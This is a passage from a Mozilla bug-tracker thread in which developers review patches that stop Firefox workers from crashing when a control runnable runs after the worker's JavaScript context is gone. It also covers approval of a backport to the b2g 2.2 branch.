::: dom/base/Console.cpp
@@ +356,5 @@
>          return true;
>        }
>  
> +      virtual nsresult
> +      Cancel() override

I'd prefer we move this to WorkerControlRunnable, all of them should behave this way.
Attachment #8594072 - Flags: review?(bent.mozilla) → review+
bent, it doesn't work in this way. What about if we do:

virtual nsresult Cancel() override { return NS_OK; }

and the nwe override this method in the console.

Feedback?
Flags: needinfo?(bent.mozilla)
Attached patch crash2.patch (obsolete) — Splinter Review
I guess we have to go back to the previous version of the patch.
Attachment #8594072 - Attachment is obsolete: true
Attachment #8594680 - Flags: review?(bent.mozilla)
Comment on attachment 8594680 [details] [diff] [review]
crash2.patch

Review of attachment 8594680 [details] [diff] [review]:
-----------------------------------------------------------------

No, comment 9 is the way we want to go here. It just exposed a different bug.
Attachment #8594680 - Flags: review?(bent.mozilla) → review-
I think we should try to figure out which WorkerControlRunnable is being scheduled after the worker has destroyed its JSContext. That's bad, and we should try to fix that.

And if we can't do that then we can make WorkerRunnable::Run a little more resilient so that it doesn't crash when being called after there's no JS context.
Flags: needinfo?(bent.mozilla)
Attached patch crash2.patchSplinter Review
I'm having hard time to reproduce this issue. At least locally I cannot see the crash. But here a patch where we check if JSContext is null:

https://treeherder.mozilla.org/#/jobs?repo=try&revision=3e1ff2213ab5
Attachment #8594680 - Attachment is obsolete: true
Attachment #8595356 - Flags: review?(bent.mozilla)
Comment on attachment 8595356 [details] [diff] [review]
crash2.patch

Review of attachment 8595356 [details] [diff] [review]:
-----------------------------------------------------------------

This looks ok... But I hate that we can't find that other late runnable...

::: dom/workers/WorkerRunnable.h
@@ +320,5 @@
>    virtual ~WorkerControlRunnable()
>    { }
>  
> +  NS_IMETHOD
> +  Cancel() override

Nit: Move the impl to the cpp file.
Attachment #8595356 - Flags: review?(bent.mozilla) → review+
This only affects 40, right?
(In reply to Andrew McCreight [:mccr8] from comment #18)
> This only affects 40, right?

Yep
Duplicate of this bug: 1157284
https://hg.mozilla.org/mozilla-central/rev/91e9b0c36889
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla40
Flags: sec-bounty? → sec-bounty+
Group: core-security
Assuming that Firefox 37 and earlier weren't affected, hence setting status-b2g-* to unaffected. Please correct if I'm wrong.
I think we should land a different version of this patch in v2.2. I'll keep the NI in order to do not forget and tomorrow I'll propose a patch.
Attached patch patch v2.2Splinter Review
Flags: needinfo?(amarchesini)
Attachment #8620913 - Flags: review?(bent.mozilla)
Attachment #8620913 - Flags: review?(bent.mozilla) → review+
Comment on attachment 8620913 [details] [diff] [review]
patch v2.2

[Approval Request Comment]
Bug caused by (feature/regressing bug #): Workers
User impact if declined: possibly a crash
Testing completed: no
Risk to taking this patch (and alternatives if risky): none
String or UUID changes made by this patch: none
Attachment #8620913 - Flags: approval-mozilla-b2g37?
(In reply to Andrea Marchesini (:baku) from comment #25)
> Comment on attachment 8620913 [details] [diff] [review]
> patch v2.2
> 
> [Approval Request Comment]
> Bug caused by (feature/regressing bug #): Workers
> User impact if declined: possibly a crash
> Testing completed: no
> Risk to taking this patch (and alternatives if risky): none
> String or UUID changes made by this patch: none

Hi Andrea,
Per comment 19 and 22, b2g37(2.2) and before are unaffected. Why we still need patch for 2.2?
Flags: needinfo?(amarchesini)
It's not about the crash itself, but it's about some worker-shutdown procedure that could be wrongly executed.
About this particular bug, yes, this cnanot be executed in v2.2, but if the worker goes away, it can happen that some control runnable is not correctly executed.
Flags: needinfo?(amarchesini)
Comment on attachment 8620913 [details] [diff] [review]
patch v2.2

Thanks Baku,
Approving this as this increase stability for 2.2
Attachment #8620913 - Flags: approval-mozilla-b2g37? → approval-mozilla-b2g37+
You need to log in before you can comment on or make changes to this bug.